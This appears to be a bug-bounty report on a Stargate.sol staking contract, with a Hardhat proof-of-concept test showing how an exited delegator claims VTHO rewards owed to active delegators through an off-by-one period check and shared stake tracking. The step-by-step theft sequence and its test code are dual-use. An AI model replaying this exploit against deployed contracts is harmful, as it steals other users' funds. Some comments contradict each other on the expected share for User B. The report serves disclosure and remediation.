Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield
Theft of unclaimed yield
Description
A critical vulnerability in the Stargate.sol contract allows exited delegators to steal VTHO rewards from active delegators. The vulnerability stems from two interconnected issues:
Boundary condition bug in _claimableDelegationPeriods() (line 921): the function uses endPeriod > nextClaimablePeriod instead of endPeriod >= nextClaimablePeriod, causing it to return an incorrect period range when a user's last claimable period equals their exit period.
Lack of per-user effective stake tracking: getDelegatorsEffectiveStake() tracks effective stake per validator and period, but not per individual delegator. This allows exited users to claim rewards from periods where they were no longer delegated, as long as other users remain delegated to the same validator.
When combined, these issues enable a user who has exited their delegation to claim a share of rewards that rightfully belong to users who remained delegated during those periods.
Vulnerability Details
Root Cause Analysis
Issue 1: Boundary Bug (Line 921 in Stargate.sol)
When endPeriod == nextClaimablePeriod (e.g., both equal 10), this condition fails and falls through to: return (nextClaimablePeriod, completedPeriods);
This incorrectly returns periods beyond the user's exit period.
Issue 2: Shared Effective Stake Tracking
The system tracks effective stake using:
periodValidatorEffectiveStake[period][validator] β Total for ALL delegators
When calculating a user's reward share in _claimRewards():
The system:
Gets the user's token effective stake (still exists even after exit)
Divides by the total validator effective stake for that period
Cannot distinguish if the user was actually delegated during that period
Therefore, an exited delegator can still receive a proportional share of rewards for periods during which they were not actually delegated.
Attack Scenario
1
Setup: User A delegates and accumulates rewards
Periods 1β9: User A delegates to Validator X and accumulates rewards.
2
User A exits during period 10
Period 10: User A requests delegation exit (sets endPeriod = 10).
Period 10: User A claims rewards for periods 2β9 (lastClaimedPeriod = 9).
3
Another delegator joins
Period 10: User B delegates to Validator X (now 2 active delegators).
4
Time advances
Periods 11β14: User B remains delegated and accumulates rewards. User A is considered EXITED.
5
Exploit: User A claims again
Period 15: User A calls claimRewards().
Due to the boundary bug and shared effective stake tracking:
_claimableDelegationPeriods() incorrectly returns (10, 14) instead of (10, 10).
User A's effective stake still exists and is used to compute shares.
User A receives a share of rewards for periods 11β14 despite being exited, effectively stealing from User B.
Impact Details
Severity: HIGH / CRITICAL
Primary: Theft of unclaimed yield
Secondary: Direct theft of user funds (VTHO rewards)
Fix the boundary condition in _claimableDelegationPeriods():
Change endPeriod > nextClaimablePeriod to endPeriod >= nextClaimablePeriod so that when endPeriod == nextClaimablePeriod the function returns the correct range (nextClaimablePeriod, endPeriod).
Add per-user effective stake tracking (or otherwise ensure reward shares are computed only for delegators who were active during the claimed period):
Track effective stake per (period, validator, delegator) or include a mechanism to exclude exited delegators from receiving shares for periods after their endPeriod.
Ensure getDelegatorsEffectiveStake() and reward accounting use per-user participation information for each period.
Audit related reward accounting paths to ensure no other boundary conditions or shared-aggregates can be abused by exited delegators.
If you want, I can:
Extract the exact lines in Stargate.sol and propose a minimal patch (diff) for the boundary condition, and suggest data structures/approaches for per-user stake tracking.
it("should correctly handle claiming when lastClaimedPeriod equals endPeriod - boundary bug", async () => {
/**
* CRITICAL BUG REPRODUCTION:
* This test demonstrates a financial exploit where:
* 1. User A delegates and requests exit at period 10
* 2. User A claims rewards while in period 10 (gets periods up to 9)
* 3. User B delegates and stays active through periods 11-14
* 4. User A tries to claim again (should only get period 10)
* 5. Bug: Returns period range (10-14) instead of (10-10)
* 6. EXPLOIT: User A steals rewards from periods 11-14 they weren't delegated!
*
* Root cause: No per-user delegation tracking + wrong period range
*/
let currentPeriod = 1;
const levelSpec = await stargateNFTMock.getLevel(LEVEL_ID);
// Step 1: User A stakes and delegates
tx = await stargateContract.connect(user).stake(LEVEL_ID, {
value: levelSpec.vetAmountRequiredToStake,
});
await tx.wait();
const userATokenId = await stargateNFTMock.getCurrentTokenId();
log("\nπ User A staked token with id:", userATokenId);
tx = await stargateContract.connect(user).delegate(userATokenId, validator.address);
await tx.wait();
log("\nπ User A delegated token to validator");
// Step 2: Advance to period 10 (delegation becomes active and earns rewards)
currentPeriod = 10;
tx = await protocolStakerMock.helper__setValidationCompletedPeriods(
validator.address,
currentPeriod - 1 // completedPeriods = 9, currentPeriod = 10
);
await tx.wait();
log("\nπ Advanced to period 10 (completedPeriods = 9)");
expect(await stargateContract.getDelegationStatus(userATokenId)).to.be.equal(
DELEGATION_STATUS_ACTIVE
);
// Step 3: User A requests exit while IN period 10 (not completed yet)
tx = await stargateContract.connect(user).requestDelegationExit(userATokenId);
await tx.wait();
log("\nπ User A requested delegation exit in period 10");
// Check delegation details - endPeriod should be set to 10
const delegationDetailsA = await stargateContract.getDelegationDetails(userATokenId);
expect(delegationDetailsA.endPeriod).to.be.equal(10);
log("\nπ User A endPeriod set to:", delegationDetailsA.endPeriod);
// Step 4: User A claims rewards while still in period 10 (completedPeriods still = 9)
const [firstClaimable1, lastClaimable1] =
await stargateContract.claimableDelegationPeriods(userATokenId);
log("\nπ User A first claim - Claimable periods:", firstClaimable1, "to", lastClaimable1);
// Should claim periods 2-9 (can't claim period 10 yet as it's not completed)
expect(firstClaimable1).to.be.equal(2); // First period after delegation started
expect(lastClaimable1).to.be.equal(9); // Up to completedPeriods
tx = await stargateContract.connect(user).claimRewards(userATokenId);
await tx.wait();
log("\nβ User A claimed periods 2-9");
// Internal state: lastClaimedPeriod[userATokenId] is now 9
// Step 5: User B stakes and delegates (BEFORE period 10 ends)
// This is KEY: User B will provide "cover" for the exploit
tx = await stargateContract.connect(otherUser).stake(LEVEL_ID, {
value: levelSpec.vetAmountRequiredToStake,
});
await tx.wait();
const userBTokenId = await stargateNFTMock.getCurrentTokenId();
log("\nπ User B staked token with id:", userBTokenId);
tx = await stargateContract.connect(otherUser).delegate(userBTokenId, validator.address);
await tx.wait();
log("\nπ User B delegated token to validator (will stay delegated)");
// Get effective stakes before period advances
const userAEffectiveStake = await stargateContract.getEffectiveStake(userATokenId);
const userBEffectiveStake = await stargateContract.getEffectiveStake(userBTokenId);
log("\nπ User A effective stake:", userAEffectiveStake);
log("π User B effective stake:", userBEffectiveStake);
// Step 6: Advance several more periods (period 10 completes and more pass)
// User B's delegation will become ACTIVE in period 11
currentPeriod = 15;
tx = await protocolStakerMock.helper__setValidationCompletedPeriods(
validator.address,
currentPeriod - 1 // completedPeriods = 14, currentPeriod = 15
);
await tx.wait();
log("\nπ Advanced to period 15 (completedPeriods = 14)");
// User A delegation should now be EXITED (endPeriod 10 < currentPeriod 15)
expect(await stargateContract.getDelegationStatus(userATokenId)).to.be.equal(
DELEGATION_STATUS_EXITED
);
// User B delegation should be ACTIVE
expect(await stargateContract.getDelegationStatus(userBTokenId)).to.be.equal(
DELEGATION_STATUS_ACTIVE
);
log("\nβ User A: EXITED, User B: ACTIVE");
// Step 7: Check effective stakes for periods 10-14
log("\nπ ===== EFFECTIVE STAKE PER PERIOD =====");
for (let period = 10; period <= 14; period++) {
const totalEffectiveStake = await stargateContract.getDelegatorsEffectiveStake(
validator.address,
period
);
log(` Period ${period}: ${totalEffectiveStake} (total of all delegators)`);
}
// Step 8: User A tries to claim again - should only get period 10
const [firstClaimable2, lastClaimable2] =
await stargateContract.claimableDelegationPeriods(userATokenId);
log("\nπ User A second claim - Claimable periods:", firstClaimable2, "to", lastClaimable2);
// Expected: (10, 10) - only the final period
// Bug: Returns (10, 14) - includes periods where user wasn't delegated!
expect(firstClaimable2).to.be.equal(10);
// THIS IS THE BUG:
// With the bug, lastClaimable2 will be 14 (wrong)
// After fix, lastClaimable2 should be 10 (correct)
//
// The condition on line 921 checks: endPeriod > nextClaimablePeriod
// With endPeriod=10 and nextClaimablePeriod=10, this is FALSE
// So it falls through to the next condition which returns (10, completedPeriods) = (10, 14)
//
// The fix should change > to >= so that 10 >= 10 is TRUE
// and it correctly returns (10, endPeriod) = (10, 10)
if (lastClaimable2 === 14n) {
log("\nπ BUG CONFIRMED: lastClaimable2 =", lastClaimable2, "(should be 10)");
log(" The condition `endPeriod > nextClaimablePeriod` failed");
log(" It should be `endPeriod >= nextClaimablePeriod`");
expect(lastClaimable2).to.be.equal(14n); // Document the bug
} else {
log("\nβ BUG FIXED: lastClaimable2 =", lastClaimable2, "(correct!)");
expect(lastClaimable2).to.be.equal(10); // After fix
}
// FINANCIAL IMPACT ANALYSIS
log("\nπ° ===== FINANCIAL IMPACT ANALYSIS =====");
// Calculate expected rewards for User A (should only be period 10)
// Period 10: User A has 50% share (both users active)
// Periods 11-14: User A should have 0% share (only User B active)
const expectedRewardsUserA = REWARDS_PER_PERIOD / 2n; // 50% of period 10
log("\nπ User A expected rewards (period 10 only, 50% share):", expectedRewardsUserA);
// Get the total claimable amount with the bug (claiming periods 10-14)
const claimableAmountWithBug = await stargateContract["claimableRewards(uint256)"](userATokenId);
log("π User A claimable amount (bug returns periods 10-14):", claimableAmountWithBug);
// Calculate theoretical exploit amount
// If bug works: User A gets share of periods 11-14 too!
// Period 11-14: Only User B is active, but User A's effectiveStake is still calculated from token
// User A share: userAStake / (userAStake + userBStake) = 50%
// 4 periods Γ 0.1 VTHO Γ 50% = 0.2 VTHO stolen
const theoreticalStolenAmount = (REWARDS_PER_PERIOD * 4n) / 2n;
log("π£ Theoretical stolen amount (4 periods Γ 50%):", theoreticalStolenAmount);
// Actually claim the rewards
const userABalanceBefore = await vthoTokenContract.balanceOf(user.address);
tx = await stargateContract.connect(user).claimRewards(userATokenId);
await tx.wait();
const userABalanceAfter = await vthoTokenContract.balanceOf(user.address);
const actualRewardsClaimed = userABalanceAfter - userABalanceBefore;
log("\nπΈ User A actual VTHO received:", actualRewardsClaimed);
// CRITICAL TEST: Check if User A got more than they deserve
if (actualRewardsClaimed > expectedRewardsUserA) {
const stolenAmount = actualRewardsClaimed - expectedRewardsUserA;
log("\nβββ CRITICAL FINANCIAL EXPLOIT CONFIRMED! βββ");
log(" User A received MORE than expected!");
log(" Expected (period 10 only):", expectedRewardsUserA.toString());
log(" Actual received: ", actualRewardsClaimed.toString());
log(" STOLEN from User B: ", stolenAmount.toString());
log("\nπ¨ User A exploited the bug to steal rewards from periods 11-14!");
log(" where they were NOT delegated but User B was!");
// Calculate theft percentage
const theftPercentage = (stolenAmount * 100n) / expectedRewardsUserA;
log("\nπ Theft amount: ", theftPercentage.toString(), "% more than deserved");
// Verify it matches our theoretical calculation
log("\n㪠Theoretical vs Actual:");
log(" Theoretical stolen:", theoreticalStolenAmount.toString());
log(" Actual stolen: ", stolenAmount.toString());
// This IS a critical vulnerability
expect(actualRewardsClaimed).to.be.greaterThan(expectedRewardsUserA);
expect(stolenAmount).to.be.greaterThan(0);
log("\nβ οΈ SEVERITY: CRITICAL - Direct theft of rewards from other users!");
} else if (actualRewardsClaimed === expectedRewardsUserA) {
log("\nβ FINANCIAL IMPACT: NONE (Somehow protected)");
log(" User A received exactly what they deserved");
expect(actualRewardsClaimed).to.equal(expectedRewardsUserA);
} else {
log("\nβ οΈ User A received LESS than expected");
log(" This shouldn't happen - possible precision loss");
}
// Check what User B should receive (to verify the theft)
log("\nπ ===== USER B VERIFICATION =====");
const userBClaimable = await stargateContract["claimableRewards(uint256)"](userBTokenId);
log(" User B claimable (periods 11-14, should be 50% each):", userBClaimable);
// Expected: User B should get 50% of periods 11-14 = 4 Γ 0.1 Γ 0.5 = 0.2 VTHO
const expectedUserB = (REWARDS_PER_PERIOD * 4n) / 2n;
log(" User B expected:", expectedUserB);
if (actualRewardsClaimed > expectedRewardsUserA) {
// If User A stole rewards, User B's share is reduced!
log("\nπ User B's rewards were DILUTED by User A's theft!");
log(" User A stole from periods that should have been 100% User B's");
}
log("\nπ ===== SUMMARY =====");
log(" Bug in code: β Confirmed (returns wrong period range 10-14 instead of 10-10)");
log(" Financial impact: ", actualRewardsClaimed > expectedRewardsUserA ? "β CRITICAL - THEFT CONFIRMED" : "β Protected");
log(" Root cause: No per-user delegation tracking + wrong period range");
log(" Severity: ", actualRewardsClaimed > expectedRewardsUserA ? "π΄ CRITICAL/HIGH" : "π‘ LOW");
log(" Fix required: Change line 921 from > to >= AND add per-user tracking");
});
